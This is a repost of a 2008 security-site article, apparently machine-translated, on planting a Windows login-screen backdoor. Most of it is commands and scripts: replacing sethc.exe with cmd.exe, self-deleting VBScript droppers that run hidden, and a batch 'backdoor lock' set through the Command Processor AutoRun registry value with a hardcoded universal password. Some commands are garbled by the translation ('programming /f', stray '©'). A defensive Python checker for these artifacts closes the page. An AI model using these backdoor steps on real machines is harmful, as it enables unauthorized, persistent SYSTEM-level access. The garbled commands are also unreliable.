Using sticky keys to create a backdoor on Vista - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200821672
Type myhack58
Reporter Anonymous
Modified 2008-12-28T00:00:00


What is sticky keys?

When you press the Shift key 5 times in a row in the Windows operating system, what comes up?

In Windows 2000/XP/Vista, pressing the Shift key 5 times turns on sticky keys by running sethc.exe, and this also works at the login screen. It is reminiscent of the Windows screensaver trick: if the program is replaced with cmd.exe, you can open a shell.

First, the concrete replacement method:

XP system (eject the installation source disc, or rename the installation directory on the hard disk):

    cd %widnir%\system32\dllcache
    ren sethc.exe *.ex~
    cd %widnir%\system32
    copy /y cmd.exe sethc.exe

Vista system:

    programming /f c:\windows\system32\sethc.exe
    cacls c:\windows\system32\sethc.exe /G administrator:F

Note: the two commands above obtain the permissions. You can also use the Vista optimization guru tool to add an elevation entry to the right-click menu, and then right-click the exe file above to elevate access directly. Then replace the file using the XP method.

At the login screen, press SHIFT 5 times to bring up a cmd shell, and then......

Second, the backdoor extension:

    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c programming /f %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c echo y cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

The second statement is the most interesting. Hey.... I've encountered similar problems

A later update adds self-deletion and simplifies the code:

    On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c programming /f %SystemRoot%\system32\with. exe&echo y cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc. exedel %SystemRoot%\system32\with. exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Third, the backdoor lock extension:

allyesno note: You can use the cmd lock to give the cmd shell password verification. Hey.... and

To use the backdoor lock below, save the code as bdlock.bat

Then modify the registry location:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
    "AutoRun"="bdlock.bat"

    @Echo Off
    title back door login authentication
    color a
    cls
    set temprandom=%RANDOM%
    echo please enter the verification code:%temprandom%
    set/p check=
    if "%check%"=="%temprandom%%temprandom%" goto passcheck
    if "%check%"=="%temprandom%" (
    rem Backdoor Server Authentication
    rem if there is no backdoor authentication server, please
    rem comment out the following line of code
    if exist \\trojandownloader$\pass goto passcheck
    )
    echo verify failed
    pause
    exit
    :passcheck
    echo verification successful
    If "%passcmdlock%"== Goto endx
    Set passcmdlock=http://www.xxx.com/
    :allyesno
    Set Errorlevel=>nul
    Echo please enter the verification code?
    Set password=allyesno Is a pig>nul
    Set/p password=
    rem universal password
    if "%password%"=="allyesno is a sb" goto endx
    If %time:~1,1%==0 Set timechange=a
    If %time:~1,1%==1 Set timechange=b
    If %time:~1,1%==2 Set timechange=c
    If %time:~1,1%==3 Set timechange=d
    If %time:~1,1%==4 Set timechange=e
    If %time:~1,1%==5 Set timechange=f
    If %time:~1,1%==6 Set timechange=g
    If %time:~1,1%==7 Set timechange=h
    If %time:~1,1%==8 Set timechange=i
    If %time:~1,1%==9 Set timechange=j
    set/a sum=%time:~1,1%+%time:~1,1%
    Set password findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
    If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End
    Echo please contact me for the correct password!&Goto allyesno
    :End
    Set password=>nul
    Set Errorlevel=>nul
    Echo is very good, very harmonious!
    :endx
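A defender's check for the artifacts described above, added here as an example and not part of the original post: it flags a sethc.exe that hashes the same as cmd.exe, the leftover files the scripts create, and a Command Processor AutoRun value. The function names are hypothetical; it assumes a path to a system32 directory (live host or mounted image) and already-decoded `reg export` text.

```python
import hashlib
import re
from pathlib import Path

# File names and registry key are the ones that appear on this page.
LEFTOVERS = ("asethc.exe", "acmd.exe", "dllcache/sethc.ex~")
AUTORUN_KEY = r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]"

def find(root, rel):
    """Case-insensitive lookup of rel under root; returns a Path or None."""
    cur = Path(root)
    for part in rel.split("/"):
        if not cur.is_dir():
            return None
        cur = next((p for p in cur.iterdir() if p.name.lower() == part.lower()), None)
        if cur is None:
            return None
    return cur

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def check_system32(system32):
    """Return a list of findings for one system32 directory."""
    findings = []
    target, shell = find(system32, "sethc.exe"), find(system32, "cmd.exe")
    if target is None:
        findings.append("sethc.exe is missing")
    elif shell is not None and digest(target) == digest(shell):
        findings.append("sethc.exe has the same SHA-256 as cmd.exe")
    for name in LEFTOVERS:
        if find(system32, name) is not None:
            findings.append("leftover file: " + name)
    return findings

def autorun_value(reg_text):
    """Return the Command Processor AutoRun value from reg export text, or None."""
    in_key = False
    for line in map(str.strip, reg_text.splitlines()):
        if line.startswith("["):
            # Track whether we are inside the Command Processor key section.
            in_key = line.lower() == AUTORUN_KEY.lower()
        elif in_key:
            m = re.match(r'"autorun"="(.*)"$', line, re.IGNORECASE)
            if m:
                return m.group(1)
    return None
```

Any non-empty AutoRun value under that key deserves review, since cmd.exe runs it each time a shell starts.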